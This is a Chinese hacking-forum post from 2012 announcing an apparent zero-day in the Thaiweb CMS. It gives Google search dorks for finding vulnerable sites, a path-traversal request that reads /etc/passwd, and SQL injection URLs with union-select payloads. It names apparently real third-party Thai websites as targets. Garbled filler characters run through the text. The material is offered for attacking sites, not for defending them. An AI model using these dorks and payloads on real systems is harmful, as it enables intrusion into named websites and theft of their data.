找回密码
 立即注册
查看: 2454|回复: 0
打印 上一主题 下一主题

Thaiweb远程文件sql注入漏洞0day

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-27 08:38:39 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
Google之:
3 [- |3 w" Q2 A6 \; O  D% ?5 q) p* c. s# ~. y
intext:powered by Thaiweb! {& X3 `" {  v# O3 c+ h

! t9 a- _4 k9 p! X; f  N6 Q! D% o( f7 N+ @inurl:index.php?page=board.php
$ S+ X3 I8 c  J& }5 U* o& `5 G# q0 @/ T! D3 W! R% i. m
/ @0 {! P4 D. s" c4 G2 M6 A

* }: t2 x1 Z5 J利用点1:http://www.xfack.com/index.php?p ... ../../../etc/passwd8 G, }( V% f4 S2 Q$ c
3 t  t; e% I; P5 p  w
  ]1 |4 Q( a& t! k8 u9 G
0 J8 w8 a" `( P- ?& @$ }) b
利用点2:http://www.xfack.com/index.php?page=boardque.php&bod_id=4'
3 S( n1 f# X' O$ }3 H; o( @0 J  U6 n2 ?2 R9 T4 ?
9 R/ R6 I: A% Y" f
$ j/ @8 {5 w6 r8 z6 r8 L7 _
http://www.keytasin.com//index.p ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--$ F. q4 @6 u% y5 W8 D# V

7 U6 P0 K/ P) J/ ^5 Phttp://www.autopartnerthailand.c ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--0 d' B' p7 J$ Q! a: v$ ~

* \- B: |  j) y" E' ]1 A0 @3 g2 L% Hhttp://gift.in.th/index.php?page ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--- X* T+ P" \3 I+ D
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表